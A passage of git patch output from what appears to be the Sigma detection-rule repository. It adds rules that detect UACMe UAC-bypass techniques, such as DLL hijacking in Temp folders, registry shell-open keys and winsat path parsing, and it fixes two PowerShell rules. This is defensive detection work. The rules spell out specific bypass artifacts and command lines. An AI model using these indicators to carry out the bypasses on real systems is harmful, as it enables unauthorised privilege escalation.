of sdclt.exe (e.g. UACMe 53) references: - https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/ -author: Omer Yampel + - https://github.com/hfiref0x/UACME +author: Omer Yampel, Christian Burkard date: 2017/03/17 -modified: 2020/09/06 +modified: 2021/08/31 logsource: category: registry_event product: windows detection: - selection: + selection1: # usrclass.dat is mounted on HKU\USERSID_Classes\... TargetObject|startswith: 'HKU\' TargetObject|endswith: '_Classes\exefile\shell\runas\command\isolatedCommand' - condition: selection + selection2: + TargetObject|endswith: '-1???_Classes\Folder\shell\open\command\SymbolicLinkValue' + Details|contains: '-1???\Software\Classes\' + condition: 1 of selection* tags: - attack.defense_evasion - attack.privilege_escalation From 3a9e10d081f4f005abf68f938a024470888f98c6 Mon Sep 17 00:00:00 2001 From: phantinuss Date: Tue, 31 Aug 2021 12:45:07 +0200 Subject: [PATCH 0643/1367] bulk of new rules to match working UACMe UAC bypasses --- .../sysmon_uac_bypass_cleanmgr_tmpfile.yml | 25 ++++++++++++++ .../sysmon_uac_bypass_consent_comctl32.yml | 23 +++++++++++++ .../sysmon_uac_bypass_dotnet_profiler.yml | 23 +++++++++++++ .../file_event/sysmon_uac_bypass_ieinstal.yml | 24 ++++++++++++++ .../sysmon_uac_bypass_msconfig_gui.yml | 23 +++++++++++++ .../sysmon_uac_bypass_ntfs_reparse_point.yml | 23 +++++++++++++ .../file_event/sysmon_uac_bypass_winsat.yml | 25 ++++++++++++++ .../file_event/sysmon_uac_bypass_wmp.yml | 26 +++++++++++++++ .../sysmon_uac_bypass_wow64_logger.yml | 24 ++++++++++++++ .../win_hktl_uacme_uac_bypass.yml | 24 ++++++++++++++ .../win_uac_bypass_changepk_slui.yml | 26 +++++++++++++++ .../win_uac_bypass_cleanmgr.yml | 24 ++++++++++++++ .../win_uac_bypass_consent_comctl32.yml | 24 ++++++++++++++ .../win_uac_bypass_dismhost.yml | 33 +++++++++++++++++++ .../win_uac_bypass_ieinstal.yml | 24 ++++++++++++++ .../win_uac_bypass_msconfig_gui.yml | 24 ++++++++++++++ .../win_uac_bypass_ntfs_reparse_point.yml | 32 ++++++++++++++++++ .../win_uac_bypass_pkgmgr_dism.yml | 24 ++++++++++++++ .../win_uac_bypass_winsat.yml | 24 ++++++++++++++ .../process_creation/win_uac_bypass_wmp.yml | 27 +++++++++++++++ .../win_uac_bypass_wsreset.yml | 25 ++++++++++++++ .../sysmon_uac_bypass_shell_open.yml | 24 ++++++++++++++ .../sysmon_uac_bypass_winsat.yml | 25 ++++++++++++++ .../registry_event/sysmon_uac_bypass_wmp.yml | 23 +++++++++++++ 24 files changed, 599 insertions(+) create mode 100644 rules/windows/file_event/sysmon_uac_bypass_cleanmgr_tmpfile.yml create mode 100644 rules/windows/file_event/sysmon_uac_bypass_consent_comctl32.yml create mode 100644 rules/windows/file_event/sysmon_uac_bypass_dotnet_profiler.yml create mode 100644 rules/windows/file_event/sysmon_uac_bypass_ieinstal.yml create mode 100644 rules/windows/file_event/sysmon_uac_bypass_msconfig_gui.yml create mode 100644 rules/windows/file_event/sysmon_uac_bypass_ntfs_reparse_point.yml create mode 100644 rules/windows/file_event/sysmon_uac_bypass_winsat.yml create mode 100644 rules/windows/file_event/sysmon_uac_bypass_wmp.yml create mode 100644 rules/windows/process_access/sysmon_uac_bypass_wow64_logger.yml create mode 100644 rules/windows/process_creation/win_hktl_uacme_uac_bypass.yml create mode 100644 rules/windows/process_creation/win_uac_bypass_changepk_slui.yml create mode 100644 rules/windows/process_creation/win_uac_bypass_cleanmgr.yml create mode 100644 rules/windows/process_creation/win_uac_bypass_consent_comctl32.yml create mode 100644 rules/windows/process_creation/win_uac_bypass_dismhost.yml create mode 100644 rules/windows/process_creation/win_uac_bypass_ieinstal.yml create mode 100644 rules/windows/process_creation/win_uac_bypass_msconfig_gui.yml create mode 100644 rules/windows/process_creation/win_uac_bypass_ntfs_reparse_point.yml create mode 100644 rules/windows/process_creation/win_uac_bypass_pkgmgr_dism.yml create mode 100644 rules/windows/process_creation/win_uac_bypass_winsat.yml create mode 100644 rules/windows/process_creation/win_uac_bypass_wmp.yml create mode 100644 rules/windows/process_creation/win_uac_bypass_wsreset.yml create mode 100644 rules/windows/registry_event/sysmon_uac_bypass_shell_open.yml create mode 100644 rules/windows/registry_event/sysmon_uac_bypass_winsat.yml create mode 100644 rules/windows/registry_event/sysmon_uac_bypass_wmp.yml diff --git a/rules/windows/file_event/sysmon_uac_bypass_cleanmgr_tmpfile.yml b/rules/windows/file_event/sysmon_uac_bypass_cleanmgr_tmpfile.yml new file mode 100644 index 00000000..fca1e671 --- /dev/null +++ b/rules/windows/file_event/sysmon_uac_bypass_cleanmgr_tmpfile.yml @@ -0,0 +1,25 @@ +title: UAC Bypass Using Cleanmgr Temp File Creation +id: 6a8a8a65-15ac-4722-adb7-c93c213c180a +description: Detects the pattern of UAC bypass using cleanmgr.exe to create temporary files (UACMe 63) +author: Christian Burkard +date: 2021/08/30 +status: experimental +references: + - https://github.com/hfiref0x/UACME +tags: + - attack.defense_evasion + - attack.privilege_escalation + - attack.t1548.002 +falsepositives: + - Unknown +level: high +logsource: + category: file_event + product: windows +detection: + selection: + Image: 'C:\Windows\system32\cleanmgr.exe' + TargetFilename|startswith: 'C:\Users\' + TargetFilename|contains: '\AppData\Local\Temp\' + TargetFilename|endswith: '.dll' + condition: selection diff --git a/rules/windows/file_event/sysmon_uac_bypass_consent_comctl32.yml b/rules/windows/file_event/sysmon_uac_bypass_consent_comctl32.yml new file mode 100644 index 00000000..da6b278e --- /dev/null +++ b/rules/windows/file_event/sysmon_uac_bypass_consent_comctl32.yml @@ -0,0 +1,23 @@ +title: UAC Bypass Using Consent and Comctl32 - File +id: 62ed5b55-f991-406a-85d9-e8e8fdf18789 +description: Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22) +author: Christian Burkard +date: 2021/08/23 +status: experimental +references: + - https://github.com/hfiref0x/UACME +tags: + - attack.defense_evasion + - attack.privilege_escalation + - attack.t1548.002 +falsepositives: + - Unknown +level: high +logsource: + category: file_event + product: windows +detection: + selection: + TargetFilename|startswith: 'C:\Windows\System32\consent.exe.@' + TargetFilename|endswith: '\comctl32.dll' + condition: selection \ No newline at end of file diff --git a/rules/windows/file_event/sysmon_uac_bypass_dotnet_profiler.yml b/rules/windows/file_event/sysmon_uac_bypass_dotnet_profiler.yml new file mode 100644 index 00000000..574a79b9 --- /dev/null +++ b/rules/windows/file_event/sysmon_uac_bypass_dotnet_profiler.yml @@ -0,0 +1,23 @@ +title: UAC Bypass Using .NET Code Profiler on MMC +id: 93a19907-d4f9-4deb-9f91-aac4692776a6 +description: Detects the pattern of UAC Bypass using .NET Code Profiler and mmc.exe DLL hijacking (UACMe 39) +author: Christian Burkard +date: 2021/08/30 +status: experimental +references: + - https://github.com/hfiref0x/UACME +tags: + - attack.defense_evasion + - attack.privilege_escalation + - attack.t1548.002 +falsepositives: + - Unknown +level: high +logsource: + category: file_event + product: windows +detection: + selection: + TargetFilename|startswith: 'C:\Users\' + TargetFilename|endswith: '\AppData\Local\Temp\pe386.dll' + condition: selection diff --git a/rules/windows/file_event/sysmon_uac_bypass_ieinstal.yml b/rules/windows/file_event/sysmon_uac_bypass_ieinstal.yml new file mode 100644 index 00000000..6e61f089 --- /dev/null +++ b/rules/windows/file_event/sysmon_uac_bypass_ieinstal.yml @@ -0,0 +1,24 @@ +title: UAC Bypass Using IEInstal - File +id: bdd8157d-8e85-4397-bb82-f06cc9c71dbb +description: Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64) +author: Christian Burkard +date: 2021/08/30 +status: experimental +references: + - https://github.com/hfiref0x/UACME +tags: + - attack.defense_evasion + - attack.privilege_escalation + - attack.t1548.002 +falsepositives: + - Unknown +level: high +logsource: + category: file_event + product: windows +detection: + selection: + Image: 'C:\Program Files\Internet Explorer\IEInstal.exe' + TargetFilename|startswith: 'C:\Users\' + TargetFilename|endswith: '\AppData\Local\Temp\IDC1.tmp\[1]consent.exe' + condition: selection diff --git a/rules/windows/file_event/sysmon_uac_bypass_msconfig_gui.yml b/rules/windows/file_event/sysmon_uac_bypass_msconfig_gui.yml new file mode 100644 index 00000000..cc0d08e6 --- /dev/null +++ b/rules/windows/file_event/sysmon_uac_bypass_msconfig_gui.yml @@ -0,0 +1,23 @@ +title: UAC Bypass Using MSConfig Token Modification - File +id: 41bb431f-56d8-4691-bb56-ed34e390906f +description: Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55) +author: Christian Burkard +date: 2021/08/30 +status: experimental +references: + - https://github.com/hfiref0x/UACME +tags: + - attack.defense_evasion + - attack.privilege_escalation + - attack.t1548.002 +falsepositives: + - Unknown +level: high +logsource: + category: file_event + product: windows +detection: + selection: + TargetFilename|startswith: 'C:\Users\' + TargetFilename|endswith: '\AppData\Local\Temp\pkgmgr.exe' + condition: selection diff --git a/rules/windows/file_event/sysmon_uac_bypass_ntfs_reparse_point.yml b/rules/windows/file_event/sysmon_uac_bypass_ntfs_reparse_point.yml new file mode 100644 index 00000000..4c8b8198 --- /dev/null +++ b/rules/windows/file_event/sysmon_uac_bypass_ntfs_reparse_point.yml @@ -0,0 +1,23 @@ +title: UAC Bypass Using NTFS Reparse Point - File +id: 7fff6773-2baa-46de-a24a-b6eec1aba2d1 +description: Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36) +author: Christian Burkard +date: 2021/08/30 +status: experimental +references: + - https://github.com/hfiref0x/UACME +tags: + - attack.defense_evasion + - attack.privilege_escalation + - attack.t1548.002 +falsepositives: + - Unknown +level: high +logsource: + category: file_event + product: windows +detection: + selection: + TargetFilename|startswith: 'C:\Users\' + TargetFilename|endswith: '\AppData\Local\Temp\api-ms-win-core-kernel32-legacy-l1.DLL' + condition: selection diff --git a/rules/windows/file_event/sysmon_uac_bypass_winsat.yml b/rules/windows/file_event/sysmon_uac_bypass_winsat.yml new file mode 100644 index 00000000..74017b15 --- /dev/null +++ b/rules/windows/file_event/sysmon_uac_bypass_winsat.yml @@ -0,0 +1,25 @@ +title: UAC Bypass Abusing Winsat Path Parsing - File +id: 155dbf56-e0a4-4dd0-8905-8a98705045e8 +description: Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52) +author: Christian Burkard +date: 2021/08/30 +status: experimental +references: + - https://github.com/hfiref0x/UACME +tags: + - attack.defense_evasion + - attack.privilege_escalation + - attack.t1548.002 +falsepositives: + - Unknown +level: high +logsource: + category: file_event + product: windows +detection: + selection: + TargetFilename|startswith: 'C:\Users\' + TargetFilename|endswith: + - '\AppData\Local\Temp\system32\winsat.exe' + - '\AppData\Local\Temp\system32\winmm.dll' + condition: selection diff --git a/rules/windows/file_event/sysmon_uac_bypass_wmp.yml b/rules/windows/file_event/sysmon_uac_bypass_wmp.yml new file mode 100644 index 00000000..efb7a09c --- /dev/null +++ b/rules/windows/file_event/sysmon_uac_bypass_wmp.yml @@ -0,0 +1,26 @@ +title: UAC Bypass Using Windows Media Player - File +id: 68578b43-65df-4f81-9a9b-92f32711a951 +description: Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32) +author: Christian Burkard +date: 2021/08/23 +status: experimental +references: + - https://github.com/hfiref0x/UACME +tags: + - attack.defense_evasion + - attack.privilege_escalation + - attack.t1548.002 +falsepositives: + - Unknown +level: high +logsource: + category: file_event + product: windows +detection: + selection1: + TargetFilename|startswith: 'C:\Users\' + TargetFilename|endswith: '\AppData\Local\Temp\OskSupport.dll' + selection2: + Image: 'C:\Windows\system32\DllHost.exe' + TargetFilename: 'C:\Program Files\Windows Media Player\osk.exe' + condition: 1 of selection* diff --git a/rules/windows/process_access/sysmon_uac_bypass_wow64_logger.yml b/rules/windows/process_access/sysmon_uac_bypass_wow64_logger.yml new file mode 100644 index 00000000..bf6ac9d8 --- /dev/null +++ b/rules/windows/process_access/sysmon_uac_bypass_wow64_logger.yml @@ -0,0 +1,24 @@ +title: UAC Bypass Using WOW64 Logger DLL Hijack +id: 4f6c43e2-f989-4ea5-bcd8-843b49a0317c +description: Detects the pattern of UAC Bypass using a WoW64 logger DLL hijack (UACMe 30) +author: Christian Burkard +date: 2021/08/23 +status: experimental +references: + - https://github.com/hfiref0x/UACME +tags: + - attack.defense_evasion + - attack.privilege_escalation + - attack.t1548.002 +logsource: + category: process_access + product: windows +detection: + selection: + SourceImage|contains: ':\Windows\SysWOW64\' + GrantedAccess: '0x1fffff' + CallTrace|startswith: 'UNKNOWN(0000000000000000)|UNKNOWN(0000000000000000)|' + condition: selection +falsepositives: + - Unknown +level: high diff --git a/rules/windows/process_creation/win_hktl_uacme_uac_bypass.yml b/rules/windows/process_creation/win_hktl_uacme_uac_bypass.yml new file mode 100644 index 00000000..09ac275e --- /dev/null +++ b/rules/windows/process_creation/win_hktl_uacme_uac_bypass.yml @@ -0,0 +1,24 @@ +title: UAC Bypass Tool UACMe +id: d38d2fa4-98e6-4a24-aff1-410b0c9ad177 +description: Detects execution of UACMe (a tool used for UAC bypass) via default PE metadata +author: Christian Burkard +date: 2021/08/30 +status: experimental +references: + - https://github.com/hfiref0x/UACME +tags: + - attack.defense_evasion + - attack.privilege_escalation + - attack.t1548.002 +falsepositives: + - Unknown +level: high +logsource: + category: process_creation + product: windows +detection: + selection: + - Product: 'UACMe' + - Company: 'REvol Corp' + - OriginalFileName: 'Akagi.exe' + condition: selection diff --git a/rules/windows/process_creation/win_uac_bypass_changepk_slui.yml b/rules/windows/process_creation/win_uac_bypass_changepk_slui.yml new file mode 100644 index 00000000..b7c37d4e --- /dev/null +++ b/rules/windows/process_creation/win_uac_bypass_changepk_slui.yml @@ -0,0 +1,26 @@ +title: UAC Bypass Using ChangePK and SLUI +id: 503d581c-7df0-4bbe-b9be-5840c0ecc1fc +description: Detects an UAC bypass that uses changepk.exe and slui.exe (UACMe 61) +author: Christian Burkard +date: 2021/08/23 +status: experimental +references: + - https://mattharr0ey.medium.com/privilege-escalation-uac-bypass-in-changepk-c40b92818d1b + - https://github.com/hfiref0x/UACME + - https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf +tags: + - attack.defense_evasion + - attack.privilege_escalation + - attack.t1548.002 +logsource: + category: process_creation + product: windows +detection: + selection: + Image|endswith: '\changepk.exe' + ParentImage|endswith: '\slui.exe' + IntegrityLevel: 'High' + condition: selection +falsepositives: + - Unknown +level: high diff --git a/rules/windows/process_creation/win_uac_bypass_cleanmgr.yml b/rules/windows/process_creation/win_uac_bypass_cleanmgr.yml new file mode 100644 index 00000000..91546a9b --- /dev/null +++ b/rules/windows/process_creation/win_uac_bypass_cleanmgr.yml @@ -0,0 +1,24 @@ +title: UAC Bypass Using Disk Cleanup +id: b697e69c-746f-4a86-9f59-7bfff8eab881 +description: Detects the pattern of UAC Bypass using scheduled tasks and variable expansion of cleanmgr.exe (UACMe 34) +author: Christian Burkard +date: 2021/08/30 +status: experimental +references: + - https://github.com/hfiref0x/UACME +tags: + - attack.defense_evasion + - attack.privilege_escalation + - attack.t1548.002 +falsepositives: + - Unknown +level: high +logsource: + category: process_creation + product: windows +detection: + selection: + CommandLine|endswith: '"\system32\cleanmgr.exe /autoclean /d C:' + ParentCommandLine: 'C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule' + IntegrityLevel: 'High' + condition: selection diff --git a/rules/windows/process_creation/win_uac_bypass_consent_comctl32.yml b/rules/windows/process_creation/win_uac_bypass_consent_comctl32.yml new file mode 100644 index 00000000..61fb4b62 --- /dev/null +++ b/rules/windows/process_creation/win_uac_bypass_consent_comctl32.yml @@ -0,0 +1,24 @@ +title: UAC Bypass Using Consent and Comctl32 - Process +id: 1ca6bd18-0ba0-44ca-851c-92ed89a61085 +description: Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22) +author: Christian Burkard +date: 2021/08/23 +status: experimental +references: + - https://github.com/hfiref0x/UACME +tags: + - attack.defense_evasion + - attack.privilege_escalation + - attack.t1548.002 +falsepositives: + - Unknown +level: high +logsource: + category: process_creation + product: windows +detection: + selection: + ParentImage|endswith: '\consent.exe' + Image|endswith: '\werfault.exe' + IntegrityLevel: 'System' + condition: selection diff --git a/rules/windows/process_creation/win_uac_bypass_dismhost.yml b/rules/windows/process_creation/win_uac_bypass_dismhost.yml new file mode 100644 index 00000000..f0c206f6 --- /dev/null +++ b/rules/windows/process_creation/win_uac_bypass_dismhost.yml @@ -0,0 +1,33 @@ +title: UAC Bypass Using DismHost +id: 853e74f9-9392-4935-ad3b-2e8c040dae86 +description: Detects the pattern of UAC Bypass using DismHost DLL hijacking (UACMe 63) +author: Christian Burkard +date: 2021/08/30 +status: experimental +references: + - https://github.com/hfiref0x/UACME +tags: + - attack.defense_evasion + - attack.privilege_escalation + - attack.t1548.002 +falsepositives: + - Unknown +level: high +logsource: + category: process_creation + product: windows +detection: + selection1: + ParentImage|contains|all: + - 'C:\Users\' + - '\AppData\Local\Temp\' + - '\DismHost.exe' + IntegrityLevel: 'High' + selection2: + Image|contains|all: + - 'C:\Users\' + - '\AppData\Local\Temp\' + - '\DismHost.exe' + IntegrityLevel: 'High' + ParentCommandLine: 'C:\Windows\system32\cleanmgr.exe /autoclean /d C:' + condition: 1 of selection* diff --git a/rules/windows/process_creation/win_uac_bypass_ieinstal.yml b/rules/windows/process_creation/win_uac_bypass_ieinstal.yml new file mode 100644 index 00000000..e45aa045 --- /dev/null +++ b/rules/windows/process_creation/win_uac_bypass_ieinstal.yml @@ -0,0 +1,24 @@ +title: UAC Bypass Using IEInstal - Process +id: 80fc36aa-945e-4181-89f2-2f907ab6775d +description: Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64) +author: Christian Burkard +date: 2021/08/30 +status: experimental +references: + - https://github.com/hfiref0x/UACME +tags: + - attack.defense_evasion + - attack.privilege_escalation + - attack.t1548.002 +falsepositives: + - Unknown +level: high +logsource: + category: process_creation + product: windows +detection: + selection: + IntegrityLevel: 'High' + ParentImage|endswith: '\ieinstal.exe' + Image|endswith: '\AppData\Local\Temp\IDC1.tmp\[1]consent.exe' + condition: selection diff --git a/rules/windows/process_creation/win_uac_bypass_msconfig_gui.yml b/rules/windows/process_creation/win_uac_bypass_msconfig_gui.yml new file mode 100644 index 00000000..7d2f6aae --- /dev/null +++ b/rules/windows/process_creation/win_uac_bypass_msconfig_gui.yml @@ -0,0 +1,24 @@ +title: UAC Bypass Using MSConfig Token Modification - Process +id: ad92e3f9-7eb6-460e-96b1-582b0ccbb980 +description: Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55) +author: Christian Burkard +date: 2021/08/30 +status: experimental +references: + - https://github.com/hfiref0x/UACME +tags: + - attack.defense_evasion + - attack.privilege_escalation + - attack.t1548.002 +falsepositives: + - Unknown +level: high +logsource: + category: process_creation + product: windows +detection: + selection: + IntegrityLevel: 'High' + ParentImage|endswith: '\AppData\Local\Temp\pkgmgr.exe' + CommandLine: '"C:\Windows\system32\msconfig.exe" -5' + condition: selection diff --git a/rules/windows/process_creation/win_uac_bypass_ntfs_reparse_point.yml b/rules/windows/process_creation/win_uac_bypass_ntfs_reparse_point.yml new file mode 100644 index 00000000..a0f828e8 --- /dev/null +++ b/rules/windows/process_creation/win_uac_bypass_ntfs_reparse_point.yml @@ -0,0 +1,32 @@ +title: UAC Bypass Using NTFS Reparse Point - Process +id: 39ed3c80-e6a1-431b-9df3-911ac53d08a7 +description: Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36) +author: Christian Burkard +date: 2021/08/30 +status: experimental +references: + - https://github.com/hfiref0x/UACME +tags: + - attack.defense_evasion + - attack.privilege_escalation + - attack.t1548.002 +falsepositives: + - Unknown +level: high +logsource: + category: process_creation + product: windows +detection: + selection1: + CommandLine|startswith: '"C:\Windows\system32\wusa.exe" /quiet C:\Users\' + CommandLine|endswith: '\AppData\Local\Temp\update.msu' + IntegrityLevel: 'High' + selection2: + ParentCommandLine: '"C:\Windows\system32\dism.exe" /online /quiet /norestart /add-package /packagepath:"C:\Windows\system32\pe386" /ignorecheck' + IntegrityLevel: 'High' + CommandLine|contains|all: + - 'C:\Users\' + - '\AppData\Local\Temp\' + - '\dismhost.exe {' + Image|endswith: '\DismHost.exe' + condition: 1 of selection* diff --git a/rules/windows/process_creation/win_uac_bypass_pkgmgr_dism.yml b/rules/windows/process_creation/win_uac_bypass_pkgmgr_dism.yml new file mode 100644 index 00000000..570938ee --- /dev/null +++ b/rules/windows/process_creation/win_uac_bypass_pkgmgr_dism.yml @@ -0,0 +1,24 @@ +title: UAC Bypass Using PkgMgr and DISM +id: a743ceba-c771-4d75-97eb-8a90f7f4844c +description: Detects the pattern of UAC Bypass using pkgmgr.exe and dism.exe (UACMe 23) +author: Christian Burkard +date: 2021/08/23 +status: experimental +references: + - https://github.com/hfiref0x/UACME +tags: + - attack.defense_evasion + - attack.privilege_escalation + - attack.t1548.002 +logsource: + category: process_creation + product: windows +detection: + selection: + ParentImage|endswith: '\pkgmgr.exe' + Image|endswith: '\dism.exe' + IntegrityLevel: 'High' + condition: selection +falsepositives: + - Unknown +level: high \ No newline at end of file diff --git a/rules/windows/process_creation/win_uac_bypass_winsat.yml b/rules/windows/process_creation/win_uac_bypass_winsat.yml new file mode 100644 index 00000000..49773539 --- /dev/null +++ b/rules/windows/process_creation/win_uac_bypass_winsat.yml @@ -0,0 +1,24 @@ +title: UAC Bypass Abusing Winsat Path Parsing - Process +id: 7a01183d-71a2-46ad-ad5c-acd989ac1793 +description: Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52) +author: Christian Burkard +date: 2021/08/30 +status: experimental +references: + - https://github.com/hfiref0x/UACME +tags: + - attack.defense_evasion + - attack.privilege_escalation + - attack.t1548.002 +falsepositives: + - Unknown +level: high +logsource: + category: process_creation + product: windows +detection: + selection: + IntegrityLevel: 'High' + ParentImage|endswith: '\AppData\Local\Temp\system32\winsat.exe' + ParentCommandLine|contains: 'C:\Windows \system32\winsat.exe' + condition: selection diff --git a/rules/windows/process_creation/win_uac_bypass_wmp.yml b/rules/windows/process_creation/win_uac_bypass_wmp.yml new file mode 100644 index 00000000..6b1691be --- /dev/null +++ b/rules/windows/process_creation/win_uac_bypass_wmp.yml @@ -0,0 +1,27 @@ +title: UAC Bypass Using Windows Media Player - Process +id: 0058b9e5-bcd7-40d4-9205-95ca5a16d7b2 +description: Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32) +author: Christian Burkard +date: 2021/08/23 +status: experimental +references: + - https://github.com/hfiref0x/UACME +tags: + - attack.defense_evasion + - attack.privilege_escalation + - attack.t1548.002 +falsepositives: + - Unknown +level: high +logsource: + category: process_creation + product: windows +detection: + selection1: + Image: 'C:\Program Files\Windows Media Player\osk.exe' + IntegrityLevel: 'High' + selection2: + Image: 'C:\Windows\System32\cmd.exe' + ParentCommandLine: '"C:\Windows\system32\mmc.exe" "C:\Windows\system32\eventvwr.msc" /s' + IntegrityLevel: 'High' + condition: 1 of selection* diff --git a/rules/windows/process_creation/win_uac_bypass_wsreset.yml b/rules/windows/process_creation/win_uac_bypass_wsreset.yml new file mode 100644 index 00000000..e45b8880 --- /dev/null +++ b/rules/windows/process_creation/win_uac_bypass_wsreset.yml @@ -0,0 +1,25 @@ +title: UAC Bypass WSReset +id: 89a9a0e0-f61a-42e5-8957-b1479565a658 +description: Detects the pattern of UAC Bypass via WSReset usable by default sysmon-config +author: Christian Burkard +date: 2021/08/23 +status: experimental +references: + - https://lolbas-project.github.io/lolbas/Binaries/Wsreset/ + - https://github.com/hfiref0x/UACME + - https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf +tags: + - attack.defense_evasion + - attack.privilege_escalation + - attack.t1548.002 +logsource: + category: process_creation + product: windows +detection: + selection: + Image|endswith: '\wsreset.exe' + IntegrityLevel: 'High' + condition: selection +falsepositives: + - Unknown +level: high diff --git a/rules/windows/registry_event/sysmon_uac_bypass_shell_open.yml b/rules/windows/registry_event/sysmon_uac_bypass_shell_open.yml new file mode 100644 index 00000000..7f73e937 --- /dev/null +++ b/rules/windows/registry_event/sysmon_uac_bypass_shell_open.yml @@ -0,0 +1,24 @@ +title: UAC Bypass Using Registry Shell Open Keys +id: 152f3630-77c1-4284-bcc0-4cc68ab2f6e7 +description: Detects the pattern of UAC Bypass using fodhelper.exe or computerdefaults.exe via registry keys (UACMe 33 or 62) +author: Christian Burkard +date: 2021/08/30 +status: experimental +references: + - https://github.com/hfiref0x/UACME +tags: + - attack.defense_evasion + - attack.privilege_escalation + - attack.t1548.002 +falsepositives: + - Unknown +level: high +logsource: + category: registry_event + product: windows +detection: + selection: + Image: C:\Windows\explorer.exe + TargetObject|endswith: '-1???_Classes\ms-settings\shell\open\command\SymbolicLinkValue' + Details|contains: '-1???\Software\Classes\{' + condition: selection diff --git a/rules/windows/registry_event/sysmon_uac_bypass_winsat.yml b/rules/windows/registry_event/sysmon_uac_bypass_winsat.yml new file mode 100644 index 00000000..5d375369 --- /dev/null +++ b/rules/windows/registry_event/sysmon_uac_bypass_winsat.yml @@ -0,0 +1,25 @@ +title: UAC Bypass Abusing Winsat Path Parsing - Registry +id: 6597be7b-ac61-4ac8-bef4-d3ec88174853 +description: Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52) +author: Christian Burkard +date: 2021/08/30 +status: experimental +references: + - https://github.com/hfiref0x/UACME +tags: + - attack.defense_evasion + - attack.privilege_escalation + - attack.t1548.002 +falsepositives: + - Unknown +level: high +logsource: + category: registry_event + product: windows +detection: + selection: + TargetObject|contains: '\Root\InventoryApplicationFile\winsat.exe|' + TargetObject|endswith: '\LowerCaseLongPath' + Details|startswith: 'c:\users\' + Details|endswith: '\appdata\local\temp\system32\winsat.exe' + condition: selection diff --git a/rules/windows/registry_event/sysmon_uac_bypass_wmp.yml b/rules/windows/registry_event/sysmon_uac_bypass_wmp.yml new file mode 100644 index 00000000..ce2652e0 --- /dev/null +++ b/rules/windows/registry_event/sysmon_uac_bypass_wmp.yml @@ -0,0 +1,23 @@ +title: UAC Bypass Using Windows Media Player - Registry +id: 5f9db380-ea57-4d1e-beab-8a2d33397e93 +description: Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32) +author: Christian Burkard +date: 2021/08/23 +status: experimental +references: + - https://github.com/hfiref0x/UACME +tags: + - attack.defense_evasion + - attack.privilege_escalation + - attack.t1548.002 +falsepositives: + - Unknown +level: high +logsource: + category: registry_event + product: windows +detection: + selection: + TargetObject|endswith: '\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store\C:\Program Files\Windows Media Player\osk.exe' + Details: 'Binary Data' + condition: selection From 18cdc36d73be4314fefe8ef630802c18270eaa86 Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 31 Aug 2021 13:44:54 +0200 Subject: [PATCH 0644/1367] Fix EventID 4103 detection --- .../powershell/powershell_remote_powershell_session.yml | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/rules/windows/powershell/powershell_remote_powershell_session.yml b/rules/windows/powershell/powershell_remote_powershell_session.yml index e8e29b1a..652741eb 100644 --- a/rules/windows/powershell/powershell_remote_powershell_session.yml +++ b/rules/windows/powershell/powershell_remote_powershell_session.yml @@ -2,7 +2,7 @@ action: global title: Remote PowerShell Session id: 96b9f619-aa91-478f-bacb-c3e50f8df575 description: Detects remote PowerShell sessions -status: experimental +status: test date: 2019/08/10 modified: 2020/08/24 author: Roberto Rodriguez @Cyb3rWard0g @@ -25,9 +25,10 @@ logsource: definition: Module Logging must be enable and fields have to be extract from event detection: selection: - EventID: 4103 - HostName: 'ServerRemoteHost' - HostApplication|contains: 'wsmprovhost.exe' + EventID: 4103 + ContextInfo|contains|all: + - ' = ServerRemoteHost ' # HostName: 'ServerRemoteHost' french : Nom d’hôte = + - 'wsmprovhost.exe' # HostApplication|contains: 'wsmprovhost.exe' french Application hôte = condition: selection --- logsource: From eb434732a74cd5db3da7b803e28a9561c58e943c Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 31 Aug 2021 13:48:07 +0200 Subject: [PATCH 0645/1367] move rule not only powershell --- .../{powershell => builtin}/win_powershell_web_request.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename rules/windows/{powershell => builtin}/win_powershell_web_request.yml (96%) diff --git a/rules/windows/powershell/win_powershell_web_request.yml b/rules/windows/builtin/win_powershell_web_request.yml similarity index 96% rename from rules/windows/powershell/win_powershell_web_request.yml rename to rules/windows/builtin/win_powershell_web_request.yml index 37e172c9..54319f96 100644 --- a/rules/windows/powershell/win_powershell_web_request.yml +++ b/rules/windows/builtin/win_powershell_web_request.yml @@ -2,7 +2,7 @@ action: global title: Windows PowerShell Web Request id: 9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d status: experimental -description: Detects the use of various web request methods (including aliases) via Windows PowerShell +description: Detects the use of various web request methods (including aliases) via Windows PowerShell command references: - https://4sysops.com/archives/use-powershell-to-download-a-file-with-http-https-and-ftp/ - https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell From 6eb7245673a1288943b9f92f2d122840415e9622 Mon Sep 17 00:00:00 2001 From: phantinuss Date: Tue, 31 Aug 2021 15:58:57 +0200 Subject: [PATCH 0646/1367] fix: remove user sid, match any sid instead --- .../windows/registry_event/sysmon_uac_bypass_shell_open.yml | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/rules/windows/registry_event/sysmon_uac_bypass_shell_open.yml b/rules/windows/registry_event/sysmon_uac_bypass_shell_open.yml index 7f73e937..38c9c889 100644 